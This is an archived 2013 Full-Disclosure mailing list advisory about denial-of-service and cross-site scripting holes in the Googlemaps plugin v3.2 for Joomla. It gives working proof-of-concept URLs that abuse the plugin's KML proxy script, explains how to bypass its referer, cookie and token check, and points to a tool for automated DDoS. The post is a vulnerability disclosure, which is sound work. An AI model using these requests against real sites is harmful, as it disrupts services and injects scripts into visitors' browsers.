lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <006d01ce8a41$879e2a00$9b7a6fd5@pc>
Date: Fri, 26 Jul 2013 23:49:01 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: DoS and XSS vulnerabilities in Googlemaps plugin
	for Joomla

Hello list!

Earlier I wrote about multiple vulnerabilities in Googlemaps plugin for
Joomla (http://securityvulns.ru/docs29645.html). After my informing, the
developer fixed these vulnerabilities in versions 2.19 and 3.1 of the
plugin - by removing proxy functionality. And in version 3.2 of the plugin
he introduced new proxy functionality, which must be protected against
previous attacks. But after my checking, I've found two holes in the last
version of the plugin.

These are Denial of Service and Cross-Site Scripting vulnerabilities in
Googlemaps plugin for Joomla.

-------------------------
Affected products:
-------------------------

Vulnerable is Googlemaps plugin v3.2 for Joomla. I've informed the developer
about these holes. Now he is working on a new version.

-------------------------
Affected vendors:
-------------------------

Mike Reumer
http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147

----------
Details:
----------

To bypass protection for accessing this script it's needed to set referer,
cookie and token. The referer is current site, the cookie is set by the site
(Joomla) itself and the token can be found at page which uses plugin of the
site (and it's setting in URL). This data can be taken from the site
automatically.

Referer: http://site
Cookie: dc9023a0ff4f8a00f9b2f4e7600c17f4=69c59f0263b70f9343e0a75a93bd44a0

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/large_file&1e17f7d3d74903775e5c524dbe2cd8f1=1

Besides conducting DoS attack manually, it's also possible to conduct
automated DoS and DDoS attacks with using of DAVOSET
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008879.html).

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap3/plugin_googlemap3_kmlprxy.php?url=site2/xss.html&1e17f7d3d74903775e5c524dbe2cd8f1=1

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ